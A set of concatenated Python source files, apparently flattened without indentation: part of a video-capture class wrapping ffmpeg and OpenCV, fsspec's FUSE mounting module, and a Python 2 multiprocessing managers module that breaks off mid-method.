bytes = self.video_capture.stdout.read(int(self.height * self.width * 3))
if len(bytes) == 0:
return None
return np.frombuffer(bytes, np.uint8).reshape([self.height, self.width, 3])
elif self.video_reader == 'opencv':
if not grab:
return self.opencv_capture.read()[1]
else:
return self.opencv_capture.grab()
def read(self, grab=False) -> Union[FrameData, None]:
"""
Reads next frame from video.
@param grab: Works for OpenCV reader only. If true, doesn't decode the frame, it will be empty in FrameData object. Use retrieve() to get frame data.
@return:
@return: Tuple[frame_index, frame_timestamp, frame] or [None, None, None] if end of video
"""
if not self.started:
self.start()
frame = self._read_next_frame(grab)
if frame is None or (grab and isinstance(frame, bool) and frame == False):
return None
self.frame_idx += 1
if 0 < self.frame_count == self.frame_idx:
logger.error(f'Frame count mismatch, possibly corrupted video file: {self.filename}')
self.release()
return None
timestamp = self._get_timestamp_for_frame(self.frame_idx)
logger.debug(f'Read frame {self.frame_idx} at PTS_TIME {timestamp}')
self.last_frame_data = VideoCapture.FrameData(self.frame_idx, timestamp, frame)
return self.last_frame_data
def retrieve(self):
if self.video_reader == 'opencv':
self.last_frame_data.frame = self.opencv_capture.retrieve()[1]
return self.last_frame_data
def _get_timestamp_for_frame(self, frame_idx) -> float:
if self.video_reader == 'opencv':
# opencv handles offset internally
opencv_ts = self.opencv_capture.get(cv2.CAP_PROP_POS_MSEC) / 1000
self.timestamps.append(opencv_ts)
else:
            # wait for the timestamp record to become available; normally it is available before the frame is read
waits = 0
while frame_idx > len(self.timestamps) - 1:
time.sleep(VideoCapture.TIMESTAMP_POLL_INTERVAL)
waits += 1
if waits > VideoCapture.MAX_TIMESTAMP_WAIT:
raise Exception('Error reading video timestamps')
if waits > 0:
logger.debug(f'Waited for frame timestamp for {VideoCapture.TIMESTAMP_POLL_INTERVAL * waits} sec')
return self.timestamps[frame_idx]
def start(self):
if self.video_reader != 'opencv':
format = 'null'
pix_fmt = 'yuv420p' if self.video_reader == 'ffmpeg_yuv' else ('bgr24' if self.video_reader == 'ffmpeg_bgr' else '')
if pix_fmt:
pix_fmt = f'-pix_fmt {pix_fmt}'
format = 'rawvideo'
output = 'pipe:' if self.video_reader != 'opencv' else '-'
# start ffmpeg process
ffmpeg_cmd = f"ffmpeg -y -debug_ts -hide_banner {self.ffmpeg_decoder} -i {self.filename} -copyts -f {format} {pix_fmt} {output}"
self.video_capture = subprocess.Popen(ffmpeg_cmd.split(), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# stderr and stdout are not synchronized, read timestamp data in separate thread
self.ts_reader_thread = threading.Thread(target=self.stream_reader, args=[self.video_capture.stderr])
self.ts_reader_thread.start()
# wait for stream reader thread to fill timestamp list
time.sleep(0.05)
self.started = True
def stream_reader(self, stream):
while not self.stopping:
try:
last_line = stream.readline().decode('ascii')
if not last_line:
break
if not self.stream_data_read:
# read stream offset
                    m = re.match(r'.+Duration:.+start: (?P<start>\d*\.?\d*)', last_line)
if m:
self.offset = float(m.group('start'))
logger.info(f'Video start offset is: {self.offset}')
self.stream_data_read = True
                m = re.match(r'^demuxer\+ffmpeg -> ist_index:[0-9].+type:video.+pkt_pts_time:(?P<pkt_pts_time>\d*\.?\d*)', last_line)
if m:
timestamp = float(m.group('pkt_pts_time'))
if timestamp < self.offset:
logger.warning('Unknown behavior: pkt_pts_time is expected to be greater than stream start offset')
timestamp = self.offset
# Some frames are out-of-order by PTS, but returned to output in proper order. This may fail if corresponding debug record wasn't yet fetched when frame was read, but such behavior never observed during testing.
bisect.insort(self.timestamps, timestamp - self.offset)
if 2 < len(self.timestamps) < self.frame_idx + 3:
logger.warning('Don\'t have enough timestamp records to account for out-of-order frames')
self.timestamps = list(sorted(self.timestamps))
if not self.stream_data_read:
# stream data wasn't parsed, no point in searching for it
logger.warning('Unable to parse stream data, start offset set to 0')
self.stream_data_read = True
except:
if not self.stopping:
raise
def release(self):
"""
Stop Ffmpeg instance
@return:
"""
try:
if self.started:
self.stopping = True
self.video_capture.terminate()
if self.opencv_capture is not None:
self.opencv_capture.release()
except:
pass
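# Usage sketch (not part of the original module; 'example.mp4' is a placeholder
# path). Reads a file with the OpenCV backend and prints per-frame timestamps.
if __name__ == '__main__':
    cap = VideoCapture('example.mp4', video_reader='opencv')
    try:
        while True:
            frame_data = cap.read()
            if frame_data is None:
                break
            print(f'frame {frame_data.index} @ {frame_data.timestamp:.3f}s, shape={frame_data.frame.shape}')
    finally:
        cap.release()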
|
fuse.py
|
import argparse
import logging
import os
import stat
import threading
import time
from errno import EIO, ENOENT
from fuse import FUSE, FuseOSError, LoggingMixIn, Operations
from fsspec import __version__
from fsspec.core import url_to_fs
logger = logging.getLogger("fsspec.fuse")
class FUSEr(Operations):
def __init__(self, fs, path, ready_file=False):
self.fs = fs
self.cache = {}
self.root = path.rstrip("/") + "/"
self.counter = 0
logger.info("Starting FUSE at %s", path)
self._ready_file = ready_file
def getattr(self, path, fh=None):
logger.debug("getattr %s", path)
if self._ready_file and path in ["/.fuse_ready", ".fuse_ready"]:
return {"type": "file", "st_size": 5}
path = "".join([self.root, path.lstrip("/")]).rstrip("/")
try:
info = self.fs.info(path)
except FileNotFoundError:
raise FuseOSError(ENOENT)
data = {"st_uid": info.get("uid", 1000), "st_gid": info.get("gid", 1000)}
perm = info.get("mode", 0o777)
if info["type"] != "file":
data["st_mode"] = stat.S_IFDIR | perm
data["st_size"] = 0
data["st_blksize"] = 0
else:
data["st_mode"] = stat.S_IFREG | perm
data["st_size"] = info["size"]
data["st_blksize"] = 5 * 2 ** 20
data["st_nlink"] = 1
data["st_atime"] = time.time()
data["st_ctime"] = time.time()
data["st_mtime"] = time.time()
return data
def readdir(self, path, fh):
logger.debug("readdir %s", path)
path = "".join([self.root, path.lstrip("/")])
files = self.fs.ls(path, False)
files = [os.path.basename(f.rstrip("/")) for f in files]
return [".", ".."] + files
def mkdir(self, path, mode):
path = "".join([self.root, path.lstrip("/")])
self.fs.mkdir(path)
return 0
def rmdir(self, path):
path = "".join([self.root, path.lstrip("/")])
self.fs.rmdir(path)
return 0
def read(self, path, size, offset, fh):
logger.debug("read %s", (path, size, offset))
if self._ready_file and path in ["/.fuse_ready", ".fuse_ready"]:
return b"ready"
f = self.cache[fh]
f.seek(offset)
out = f.read(size)
return out
def write(self, path, data, offset, fh):
logger.debug("read %s", (path, offset))
f = self.cache[fh]
f.write(data)
return len(data)
def create(self, path, flags, fi=None):
logger.debug("create %s", (path, flags))
fn = "".join([self.root, path.lstrip("/")])
f = self.fs.open(fn, "wb")
self.cache[self.counter] = f
self.counter += 1
return self.counter - 1
def open(self, path, flags):
logger.debug("open %s", (path, flags))
fn = "".join([self.root, path.lstrip("/")])
if flags % 2 == 0:
# read
mode = "rb"
else:
# write/create
mode = "wb"
self.cache[self.counter] = self.fs.open(fn, mode)
self.counter += 1
return self.counter - 1
def truncate(self, path, length, fh=None):
fn = "".join([self.root, path.lstrip("/")])
if length != 0:
raise NotImplementedError
# maybe should be no-op since open with write sets size to zero anyway
self.fs.touch(fn)
def unlink(self, path):
fn = "".join([self.root, path.lstrip("/")])
try:
self.fs.rm(fn, False)
except (IOError, FileNotFoundError):
raise FuseOSError(EIO)
def release(self, path, fh):
try:
if fh in self.cache:
f = self.cache[fh]
f.close()
self.cache.pop(fh)
except Exception as e:
print(e)
return 0
def chmod(self, path, mode):
if hasattr(self.fs, "chmod"):
path = "".join([self.root, path.lstrip("/")])
return self.fs.chmod(path, mode)
raise NotImplementedError
def run(
fs,
path,
mount_point,
foreground=True,
threads=False,
ready_file=False,
ops_class=FUSEr,
):
"""Mount stuff in a local directory
This uses fusepy to make it appear as if a given path on an fsspec
instance is in fact resident within the local file-system.
    This requires that fusepy be installed, and that FUSE be available on
the system (typically requiring a package to be installed with
apt, yum, brew, etc.).
Parameters
----------
fs: file-system instance
From one of the compatible implementations
path: str
Location on that file-system to regard as the root directory to
mount. Note that you typically should include the terminating "/"
character.
mount_point: str
An empty directory on the local file-system where the contents of
the remote path will appear.
foreground: bool
Whether or not calling this function will block. Operation will
typically be more stable if True.
threads: bool
Whether or not to create threads when responding to file operations
        within the mounted directory. Operation will typically be more
stable if False.
ready_file: bool
        If True, a `.fuse_ready` file will be created in the `mount_point`
        directory once the FUSE process is ready (for debugging purposes).
ops_class: FUSEr or Subclass of FUSEr
        To override the default behavior of FUSEr. For example, logging
to file.
"""
func = lambda: FUSE(
ops_class(fs, path, ready_file=ready_file),
mount_point,
nothreads=not threads,
foreground=foreground,
)
if not foreground:
th = threading.Thread(target=func)
th.daemon = True
th.start()
return th
else: # pragma: no cover
try:
func()
except KeyboardInterrupt:
pass
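# Programmatic usage sketch (an illustration, not part of the original module):
# mount an in-memory filesystem at an existing empty directory /tmp/mem, serving
# FUSE from a background thread.
#
#     import fsspec
#     fs = fsspec.filesystem("memory")
#     fs.pipe("/data/hello.txt", b"hello world")
#     th = run(fs, "/data/", "/tmp/mem", foreground=False)
#     # /tmp/mem/hello.txt is now readable; unmount with `fusermount -u /tmp/mem`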
def main(args):
"""Mount filesystem from chained URL to MOUNT_POINT.
Examples:
python3 -m fsspec.fuse memory /usr/share /tmp/mem
python3 -m fsspec.fuse local /tmp/source /tmp/local \\
-l /tmp/fsspecfuse.log
You can also mount chained-URLs and use special settings:
python3 -m fsspec.fuse 'filecache::zip::file://data.zip' \\
/ /tmp/zip \\
-o 'filecache-cache_storage=/tmp/simplecache'
You can specify the type of the setting by using `[int]` or `[bool]`,
(`true`, `yes`, `1` represents the Boolean value `True`):
python3 -m fsspec.fuse 'simplecache::ftp://ftp1.at.proftpd.org' \\
/historic/packages/RPMS /tmp/ftp \\
-o 'simplecache-cache_storage=/tmp/simplecache' \\
-o 'simplecache-check_files=false[bool]' \\
-o 'ftp-listings_expiry_time=60[int]' \\
-o 'ftp-username=anonymous' \\
-o 'ftp-password=xieyanbo'
"""
class RawDescriptionArgumentParser(argparse.ArgumentParser):
def format_help(self):
usage = super(RawDescriptionArgumentParser, self).format_help()
parts = usage.split("\n\n")
parts[1] = self.description.rstrip()
return "\n\n".join(parts)
parser = RawDescriptionArgumentParser(prog="fsspec.fuse", description=main.__doc__)
parser.add_argument("--version", action="version", version=__version__)
parser.add_argument("url", type=str, help="fs url")
parser.add_argument("source_path", type=str, help="source directory in fs")
parser.add_argument("mount_point", type=str, help="local directory")
parser.add_argument(
"-o",
"--option",
action="append",
help="Any options of protocol included in the chained URL",
)
parser.add_argument(
"-l", "--log-file", type=str, help="Logging FUSE debug info (Default: '')"
)
parser.add_argument(
"-f",
"--foreground",
action="store_false",
help="Running in foreground or not (Default: False)",
)
parser.add_argument(
"-t",
"--threads",
action="store_false",
help="Running with threads support (Default: False)",
)
parser.add_argument(
"-r",
"--ready-file",
action="store_false",
help="The `.fuse_ready` file will exist after FUSE is ready. "
"(Debugging purpose, Default: False)",
)
args = parser.parse_args(args)
kwargs = {}
for item in args.option or []:
key, sep, value = item.partition("=")
if not sep:
parser.error(message="Wrong option: {!r}".format(item))
val = value.lower()
if val.endswith("[int]"):
value = int(value[: -len("[int]")])
elif val.endswith("[bool]"):
value = val[: -len("[bool]")] in ["1", "yes", "true"]
if "-" in key:
fs_name, setting_name = key.split("-", 1)
if fs_name in kwargs:
kwargs[fs_name][setting_name] = value
else:
kwargs[fs_name] = {setting_name: value}
else:
kwargs[key] = value
if args.log_file:
logging.basicConfig(
level=logging.DEBUG,
filename=args.log_file,
format="%(asctime)s %(message)s",
)
class LoggingFUSEr(FUSEr, LoggingMixIn):
pass
fuser = LoggingFUSEr
else:
fuser = FUSEr
fs, url_path = url_to_fs(args.url, **kwargs)
logger.debug("Mounting %s to %s", url_path, str(args.mount_point))
run(
fs,
args.source_path,
args.mount_point,
foreground=args.foreground,
threads=args.threads,
ready_file=args.ready_file,
ops_class=fuser,
)
if __name__ == "__main__":
import sys
main(sys.argv[1:])
|
managers.py
|
#
# Module providing the `SyncManager` class for dealing
# with shared objects
#
# multiprocessing/managers.py
#
# Copyright (c) 2006-2008, R Oudkerk
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of author nor the names of any contributors may be
# used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
#
__all__ = [ 'BaseManager', 'SyncManager', 'BaseProxy', 'Token' ]
#
# Imports
#
import os
import sys
import weakref
import threading
import array
import Queue
from traceback import format_exc
from multiprocess import Process, current_process, active_children, Pool, util, connection
from multiprocess.process import AuthenticationString
from multiprocess.forking import exit, Popen, assert_spawning, ForkingPickler
from multiprocess.util import Finalize, info
try:
from dill import PicklingError
except ImportError:
try:
from cPickle import PicklingError
except ImportError:
from pickle import PicklingError
#
# Register some things for pickling
#
def reduce_array(a):
return array.array, (a.typecode, a.tostring())
ForkingPickler.register(array.array, reduce_array)
view_types = [type(getattr({}, name)()) for name in ('items','keys','values')]
#
# Type for identifying shared objects
#
class Token(object):
'''
    Type to uniquely identify a shared object
'''
__slots__ = ('typeid', 'address', 'id')
def __init__(self, typeid, address, id):
(self.typeid, self.address, self.id) = (typeid, address, id)
def __getstate__(self):
return (self.typeid, self.address, self.id)
def __setstate__(self, state):
(self.typeid, self.address, self.id) = state
def __repr__(self):
return 'Token(typeid=%r, address=%r, id=%r)' % \
(self.typeid, self.address, self.id)
#
# Function for communication with a manager's server process
#
def dispatch(c, id, methodname, args=(), kwds={}):
'''
Send a message to manager using connection `c` and return response
'''
c.send((id, methodname, args, kwds))
kind, result = c.recv()
if kind == '#RETURN':
return result
raise convert_to_error(kind, result)
def convert_to_error(kind, result):
if kind == '#ERROR':
return result
elif kind == '#TRACEBACK':
assert type(result) is str
return RemoteError(result)
elif kind == '#UNSERIALIZABLE':
assert type(result) is str
return RemoteError('Unserializable message: %s\n' % result)
else:
return ValueError('Unrecognized message type')
class RemoteError(Exception):
def __str__(self):
return ('\n' + '-'*75 + '\n' + str(self.args[0]) + '-'*75)
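#
# Example (illustrative assumption, not part of the original module): a raw
# round-trip over a manager connection using `dispatch`, mirroring what
# BaseManager.connect() does further below.
#
#   from multiprocess.connection import Client
#   conn = Client(('127.0.0.1', 50000), authkey=b'secret')
#   dispatch(conn, None, 'dummy')     # returns None on success, raises on failure
#   conn.close()
#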
#
# Functions for finding the method names of an object
#
def all_methods(obj):
'''
Return a list of names of methods of `obj`
'''
temp = []
for name in dir(obj):
func = getattr(obj, name)
if hasattr(func, '__call__'):
temp.append(name)
return temp
def public_methods(obj):
'''
Return a list of names of methods of `obj` which do not start with '_'
'''
return [name for name in all_methods(obj) if name[0] != '_']
#
# Server which is run in a process controlled by a manager
#
class Server(object):
'''
Server class which runs in a process controlled by a manager object
'''
public = ['shutdown', 'create', 'accept_connection', 'get_methods',
'debug_info', 'number_of_objects', 'dummy', 'incref', 'decref']
def __init__(self, registry, address, authkey, serializer):
assert isinstance(authkey, bytes)
self.registry = registry
self.authkey = AuthenticationString(authkey)
Listener, Client = listener_client[serializer]
# do authentication later
self.listener = Listener(address=address, backlog=16)
self.address = self.listener.address
self.id_to_obj = {'0': (None, ())}
self.id_to_refcount = {}
self.mutex = threading.RLock()
self.stop = 0
def serve_forever(self):
'''
Run the server forever
'''
current_process()._manager_server = self
try:
try:
while 1:
try:
c = self.listener.accept()
except (OSError, IOError):
continue
t = threading.Thread(target=self.handle_request, args=(c,))
t.daemon = True
t.start()
except (KeyboardInterrupt, SystemExit):
pass
finally:
self.stop = 999
self.listener.close()
def handle_request(self, c):
'''
Handle a new connection
'''
funcname = result = request = None
try:
connection.deliver_challenge(c, self.authkey)
connection.answer_challenge(c, self.authkey)
request = c.recv()
ignore, funcname, args, kwds = request
assert funcname in self.public, '%r unrecognized' % funcname
func = getattr(self, funcname)
except Exception:
msg = ('#TRACEBACK', format_exc())
else:
try:
result = func(c, *args, **kwds)
except Exception:
msg = ('#TRACEBACK', format_exc())
else:
msg = ('#RETURN', result)
try:
c.send(msg)
except Exception, e:
try:
c.send(('#TRACEBACK', format_exc()))
except Exception:
pass
util.info('Failure to send message: %r', msg)
util.info(' ... request was %r', request)
util.info(' ... exception was %r', e)
c.close()
def serve_client(self, conn):
'''
Handle requests from the proxies in a particular process/thread
'''
util.debug('starting server thread to service %r',
threading.current_thread().name)
recv = conn.recv
send = conn.send
id_to_obj = self.id_to_obj
while not self.stop:
try:
methodname = obj = None
request = recv()
ident, methodname, args, kwds = request
obj, exposed, gettypeid = id_to_obj[ident]
if methodname not in exposed:
raise AttributeError(
'method %r of %r object is not in exposed=%r' %
(methodname, type(obj), exposed)
)
function = getattr(obj, methodname)
try:
res = function(*args, **kwds)
except Exception, e:
msg = ('#ERROR', e)
else:
typeid = gettypeid and gettypeid.get(methodname, None)
if typeid:
rident, rexposed = self.create(conn, typeid, res)
token = Token(typeid, self.address, rident)
msg = ('#PROXY', (rexposed, token))
else:
msg = ('#RETURN', res)
except AttributeError:
if methodname is None:
msg = ('#TRACEBACK', format_exc())
else:
try:
fallback_func = self.fallback_mapping[methodname]
result = fallback_func(
self, conn, ident, obj, *args, **kwds
)
msg = ('#RETURN', result)
except Exception:
msg = ('#TRACEBACK', format_exc())
except EOFError:
util.debug('got EOF -- exiting thread serving %r',
threading.current_thread().name)
sys.exit(0)
except Exception:
msg = ('#TRACEBACK', format_exc())
try:
try:
send(msg)
except Exception, e:
send(('#UNSERIALIZABLE', format_exc()))
except Exception, e:
util.info('exception in thread serving %r',
threading.current_thread().name)
util.info(' ... message was %r', msg)
util.info(' ... exception was %r', e)
conn.close()
sys.exit(1)
def fallback_getvalue(self, conn, ident, obj):
return obj
def fallback_str(self, conn, ident, obj):
return str(obj)
def fallback_repr(self, conn, ident, obj):
return repr(obj)
fallback_mapping = {
'__str__':fallback_str,
'__repr__':fallback_repr,
'#GETVALUE':fallback_getvalue
}
def dummy(self, c):
pass
def debug_info(self, c):
'''
Return some info --- useful to spot problems with refcounting
'''
self.mutex.acquire()
try:
result = []
keys = self.id_to_obj.keys()
keys.sort()
for ident in keys:
if ident != '0':
result.append(' %s: refcount=%s\n %s' %
(ident, self.id_to_refcount[ident],
str(self.id_to_obj[ident][0])[:75]))
return '\n'.join(result)
finally:
self.mutex.release()
def number_of_objects(self, c):
'''
Number of shared objects
'''
return len(self.id_to_obj) - 1 # don't count ident='0'
def shutdown(self, c):
'''
Shutdown this process
'''
try:
try:
util.debug('manager received shutdown message')
c.send(('#RETURN', None))
if sys.stdout != sys.__stdout__:
util.debug('resetting stdout, stderr')
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
util._run_finalizers(0)
for p in active_children():
util.debug('terminating a child process of manager')
p.terminate()
for p in active_children():
util.debug('terminating a child process of manager')
p.join()
util._run_finalizers()
util.info('manager exiting with exitcode 0')
except:
import traceback
traceback.print_exc()
finally:
exit(0)
def create(self, c, typeid, *args, **kwds):
'''
Create a new shared object and return its id
'''
self.mutex.acquire()
try:
callable, exposed, method_to_typeid, proxytype = \
self.registry[typeid]
if callable is None:
assert len(args) == 1 and not kwds
obj = args[0]
else:
obj = callable(*args, **kwds)
if exposed is None:
exposed = public_methods(obj)
if method_to_typeid is not None:
assert type(method_to_typeid) is dict
exposed = list(exposed) + list(method_to_typeid)
ident = '%x' % id(obj) # convert to string because xmlrpclib
# only has 32 bit signed integers
util.debug('%r callable returned object with id %r', typeid, ident)
self.id_to_obj[ident] = (obj, set(exposed), method_to_typeid)
if ident not in self.id_to_refcount:
self.id_to_refcount[ident] = 0
# increment the reference count immediately, to avoid
# this object being garbage collected before a Proxy
# object for it can be created. The caller of create()
# is responsible for doing a decref once the Proxy object
# has been created.
self.incref(c, ident)
return ident, tuple(exposed)
finally:
self.mutex.release()
def get_methods(self, c, token):
'''
Return the methods of the shared object indicated by token
'''
return tuple(self.id_to_obj[token.id][1])
def accept_connection(self, c, name):
'''
Spawn a new thread to serve this connection
'''
threading.current_thread().name = name
c.send(('#RETURN', None))
self.serve_client(c)
def incref(self, c, ident):
self.mutex.acquire()
try:
self.id_to_refcount[ident] += 1
finally:
self.mutex.release()
def decref(self, c, ident):
self.mutex.acquire()
try:
assert self.id_to_refcount[ident] >= 1
self.id_to_refcount[ident] -= 1
if self.id_to_refcount[ident] == 0:
del self.id_to_obj[ident], self.id_to_refcount[ident]
util.debug('disposing of obj with id %r', ident)
finally:
self.mutex.release()
#
# Class to represent state of a manager
#
class State(object):
__slots__ = ['value']
INITIAL = 0
STARTED = 1
SHUTDOWN = 2
#
# Mapping from serializer name to Listener and Client types
#
listener_client = {
'pickle' : (connection.Listener, connection.Client),
'xmlrpclib' : (connection.XmlListener, connection.XmlClient)
}
#
# Definition of BaseManager
#
class BaseManager(object):
'''
Base class for managers
'''
_registry = {}
_Server = Server
def __init__(self, address=None, authkey=None, serializer='pickle'):
if authkey is None:
authkey = current_process().authkey
self._address = address # XXX not final address if eg ('', 0)
self._authkey = AuthenticationString(authkey)
self._state = State()
self._state.value = State.INITIAL
self._serializer = serializer
self._Listener, self._Client = listener_client[serializer]
def get_server(self):
'''
Return server object with serve_forever() method and address attribute
'''
assert self._state.value == State.INITIAL
return Server(self._registry, self._address,
self._authkey, self._serializer)
def connect(self):
'''
Connect manager object to the server process
'''
Listener, Client = listener_client[self._serializer]
conn = Client(self._address, authkey=self._authkey)
dispatch(conn, None, 'dummy')
self._state.value = State.STARTED
def start(self, initializer=None, initargs=()):
'''
Spawn a server process for this manager object
'''
assert self._state.value == State.INITIAL
if initializer is not None and not hasattr(initializer, '__call__'):
raise TypeError('initializer must be a callable')
# pipe over which we will retrieve address of server
reader, writer = connection.Pipe(duplex=False)
# spawn process which runs a server
self._process = Process(
target=type(self)._run_server,
args=(self._registry, self._address, self._authkey,
self._serializer, writer, initializer, initargs),
)
ident = ':'.join(str(i) for i in self._process._identity)
self._process.name = type(self).__name__ + '-' + ident
self._process.start()
# get address of server
writer.close()
self._address = reader.recv()
reader.close()
# register a finalizer
self._state.value = State.STARTED
self.shutdown = util.Finalize(
self, type(self)._finalize_manager,
args=(self._process, self._address, self._authkey,
self._state, self._Client),
exitpriority=0
)
@classmethod
def _run_server(cls, registry, address, authkey, serializer, writer,
initializer=None, initargs=()):
'''
Create a server, report its address and run it
'''
if initializer is not None:
initializer(*initargs)
# create server
server = cls._Server(registry, address, authkey, serializer)
# inform parent process of the server's address
writer.send(server.address)
writer.close()
# run the manager
util.info('manager serving at %r', server.address)
server.serve_forever()
def _create(self, typeid, *args, **kwds):
'''
Create a new shared object; return the token and exposed tuple
'''
assert self._state.value == State.STARTED, 'server not yet started'
conn = self._Client(self._address, authkey=self._authkey)
try:
id, exposed = dispatch(conn, None, 'create', (typeid,)+args, kwds)
finally:
conn.close()
return Token(typeid, self._address, id), exposed
def join(self, timeout=None):
'''
Join the manager process (if it has been spawned)
'''
self._process.join(timeout)
def _debug_info(self):
'''
        Return some info about the server's shared objects and connections
'''
conn = self._Client(self._address, authkey=self._authkey)
try:
return dispatch(conn, None, 'debug_info')
finally:
conn.close()
def _number_of_objects(self):
'''
Return the number of shared objects
'''
conn = self._Client(self._address, authkey=self._authkey)
try:
return dispatch(conn, None, 'number_of_objects')
finally:
conn.close()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.shutdown()
@staticmethod
def _finalize_manager(process, address, authkey, state, _Client):
'''
Shutdown the manager process; will be registered as a finalizer
'''
if process.is_alive():
util.info('sending shutdown message to manager')
try:
conn = _Client(address, authkey=authkey)
try:
dispatch(conn, None, 'shutdown')
finally:
conn.close()
except Exception:
pass
process.join(timeout=0.2)
if process.is_alive():
util.info('manager still alive')
if hasattr(process, 'terminate'):
util.info('trying to `terminate()` manager process')
process.terminate()
process.join(timeout=0.1)
if process.is_alive():
util.info('manager still alive after terminate')
state.value = State.SHUTDOWN
try:
del BaseProxy._address_to_local[address]
except KeyError:
pass
address = property(lambda self: self._address)
@classmethod
def register(cls, typeid, callable=None, proxytype=None, exposed=None,
method_to_typeid=None, create_method=True):
'''
Register a typeid with the manager type
'''
if '_registry' not in cls.__dict__:
cls._registry = cls._registry.copy()
if proxytype is None:
proxytype = AutoProxy
exposed = exposed or getattr(proxytype, '_exposed_', None)
method_to_typeid = method_to_typeid or \
getattr(proxytype, '_method_to_typeid_', None)
if method_to_typeid:
for key, value in method_to_typeid.items():
assert type(key) is str, '%r is not a string' % key
assert type(value) is str, '%r is not a string' % value
cls._registry[typeid] = (
callable, exposed, method_to_typeid, proxytype
)
if create_method:
def temp(self, *args, **kwds):
util.debug('requesting creation of a shared %r object', typeid)
token, exp = self._create(typeid, *args, **kwds)
proxy = proxytype(
token, self._serializer, manager=self,
authkey=self._authkey, exposed=exp
)
conn = self._Client(token.address, authkey=self._authkey)
dispatch(conn, None, 'decref', (token.id,))
return proxy
temp.__name__ = typeid
setattr(cls, typeid, temp)
#
# Subclass of set which gets cleared after a fork
#
class ProcessLocalSet(set):
def __init__(self):
util.register_after_fork(self, lambda obj: obj.clear())
def __reduce__(self):
return type(self), ()
#
# Definition of BaseProxy
#
class BaseProxy(object):
'''
A base for proxies of shared objects
'''
_address_to_local = {}
_mutex = util.ForkAwareThreadLock()
def __init__(self, token, serializer, manager=None,
authkey=None, exposed=None, incref=True):
BaseProxy._mutex.acquire()
try:
tls_idset = BaseProxy._address_to_local.get(token.address, None)
if tls_idset is None:
tls_idset = util.ForkAwareLocal(), ProcessLocalSet()
BaseProxy._address_to_local[token.address] = tls_idset
finally:
BaseProxy._mutex.release()
# self._tls is used to record the connection used by this
# thread to communicate with the manager at token.address
self._tls = tls_idset[0]
# self._idset is used to record the identities of all shared
# objects for which the current process owns references and
# which are in the manager at token.address
self._idset = tls_idset[1]
self._token = token
self._id = self._token.id
self._manager = manager
self._serializer = serializer
self._Client = listener_client[serializer][1]
if authkey is not None:
self._authkey = AuthenticationString(authkey)
elif self._manager is not None:
self._authkey = self._manager._authkey
else:
self._authkey = current_process().authkey
if incref:
self._incref()
util.register_after_fork(self, BaseProxy._after_fork)
def _connect(self):
util.debug('making connection to manager')
name = current_process().name
if threading.current_thread().name != 'MainThread':
name += '|' + threading.current_thread().name
conn = self._Client(self._token.address, authkey=self._authkey)
dispatch(conn, None, 'accept_connection', (name,))
self._tls.connection = conn
def _callmethod(self, methodname, args=(), kwds={}):
'''
        Try to call a method of the referent and return a copy of the result
'''
try:
conn = self._tls.connection
except AttributeError:
util.debug('thread %r does not own a connection',
threading.current_thread().name)
self._connect()
conn = self._tls.connection
conn.send((self._id, methodname, args, kwds))
kind, result = conn.recv()
if kind == '#RETURN':
return result
elif kind == '#PROXY':
exposed, token = result
proxytype = self._manager._registry[token.typeid][-1]
token.address = self._token.address
proxy = proxytype(
token, self._serializer, manager=self._manager,
authkey=self._authkey, exposed=exposed
)
conn = self._Client(token.address, authkey=self._authkey)
dispatch(conn, None, 'decref', (token.id,))
return proxy
raise convert_to_error(kind, result)
def _getvalue(self):
'''
Get a copy of the value of the referent
'''
return self._callmethod('#GETVALUE')
def _incref(self):
conn = self._Client(self._token.address, authkey=self._authkey)
dispatch(conn, None, 'incref', (self._id,))
util.debug('INCREF %r', self._token.id)
self._idset.add(self._id)
state = self._manager and self._manager._state
self._close = util.Finalize(
self, BaseProxy._decref,
args=(self._token, self._authkey, state,
self._tls, self._idset, self._Client),
exitpriority=10
)
@staticmethod
def _decref(token, authkey, state, tls, idset, _Client):
idset.discard(token.id)
# check whether manager is still alive
if state is None or state.value == State.STARTED:
# tell manager this process no longer cares about referent
try:
util.debug('DECREF %r', token.id)
conn = _Client(token.address, authkey=authkey)
dispatch(conn, None, 'decref', (token.id,))
            except Exception as e:
util.debug('... decref failed %s', e)
else:
util.debug('DECREF %r -- manager already shutdown', token.id)
# check whether we can close this thread's connection because
# the process owns no more references to objects for this manager
if not idset and hasattr(tls, 'connection'):
util.debug('thread %r has no more proxies so closing conn',
threading.current_thread().name)
tls.connection.close()
del tls.connection
def _after_fork(self):
self._manager = None
try:
self._incref()
        except Exception as e:
# the proxy may just be for a manager which has shutdown
util.info('incref failed: %s' % e)
def __reduce__(self):
kwds = {}
if Popen.thread_is_spawning():
kwds['authkey'] = self._authkey
if getattr(self, '_isauto', False):
kwds['exposed'] = self._exposed_
return (RebuildProxy,
(AutoProxy, self._token, self._serializer, kwds))
else:
return (RebuildProxy,
(type(self), self._token, self._serializer, kwds))
def __deepcopy__(self, memo):
return self._getvalue()
def __repr__(self):
return '<%s object, typeid %r at %s>' % \
(type(self).__name__, self._token.typeid, '0x%x' % id(self))
def __str__(self):
'''
Return representation of the referent (or a fall-back if that fails)
'''
try:
